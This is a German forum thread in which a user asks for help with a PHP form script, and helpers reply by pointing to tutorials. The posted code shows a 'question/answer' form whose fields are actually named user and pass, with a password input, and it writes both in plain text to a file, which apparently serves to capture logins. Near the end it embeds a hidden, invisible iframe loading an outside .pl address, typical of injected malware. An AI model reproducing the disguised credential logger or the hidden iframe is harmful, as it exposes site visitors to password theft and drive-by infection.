• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

suche script

abused

Neues Mitglied
hallo ich suche ein script, das so, oder so ähnlich aussieht, wie es auf dem bild ausschaut.
Unbenannt3.jpg - Bilder und Fotos kostenlos auf ImageBanana hochladen
die daten, die in die beiden felder eingegeben werden, sollen an eine textdatei gesendet werden, aber natuerlich nicht verschlüsselt.
dort wo steht "hier soll eine Frage stehen" soll natürlich nichts stehen, sondern noch was eingetragen werden.

beispiel für einen Eintrag aus der Textdatei:
Wie alt bist du? - 13
"wie alt bist du? ist nun der eintrag aus feld 1 und "13" der eintrag aus Feld 2

ich hoffe mir kann jemand helfen, danke schonmal im Vorraus

habe hier ein solches script, das auch mal funktionierte, doch nun wird das eingegebene nicht mehr an die .txt geschickt :/

<html>

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<div align="center">
<ul>
<?php
if($login==1)
{
$Datei='test.txt';
$fp=fopen($Datei,'r');
$new=$_REQUEST['user'];
$new.=" -:- ";
$new.=$_REQUEST['pass'];

$str=fread($fp,filesize($Datei));

fclose($fp);

$str.="\r\n";
$str.=$new;

$fp = fopen($Datei, "w");

fwrite($fp, $str);

fclose($fp);

echo "<b>Danke</b>";
echo "<br><br>".$writing;
}
else {
?>
<table border="0">
<form action="15.php?login=1" method="post">
<tr><td><font size="5" color="#ADFF2F"><b> Frage:</b> </font></td><td><input type="text" size="25" name="user" class="submit2"></td></tr>
<tr><td><font size="5" color="#ADFF2F"><b> Antwort:</b> </font></td><td><input type="password" size="25" name="pass" class="submit2"></td></tr>
<tr><td colspan="2"><center><input type="submit" value="Submit" class="submit2"></td></tr>
</table></form>
<?php
}
?>
</ul>
</div>

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>

</html>

kann mir vllt jemand sagen, was daran falsch ist?

gut zu wissen. hab davon keine ahnung und das ist auch nicht von mir...
nun meine frage, kann mir jemand sowas in funktionierend machen?
bitte :(

oha, das dauert bestimmt lang bis ich so viel gelernt hab um sowas zu machen, vor allem weil ich null plan hab, wonach ich suchen muss :/
gibt wohl niemanden der sich bereit erklären würde mir sowas zu schreiben, hm?

Dir wurden mittlerweile schon mehrfach einführende Tutorials verlinkt. Wir drehen uns hier im Kreis.

Sieh es mal aus einer anderen Perspektive:

Vielleicht findest du irgendwann jemanden, der dir einen Anfang schreibt. Das wird aber mit Sicherheit nicht genau das sein, was du haben willst. Außerdem wirst du früher oder später Funktionen ändern oder neue Funktionen hinzufügen wollen.

„Danke, aber das ist nicht das, was ich meine. Außerdem brauche ich noch das und das.“

Du kannst dir dann auf ewig von Helfern anhören, dass du es doch einfach selbst lernen kannst oder… du könntest es einfach selbst lernen und bei konkreten Problemen konkrete Fragen stellen, die Helfer dann auch gerne beantworten, wenn sie können.

Wenn du das nicht möchtest, bleibt dir noch die Möglichkeit, ein Jobangebot einzustellen.

Zurück
Oben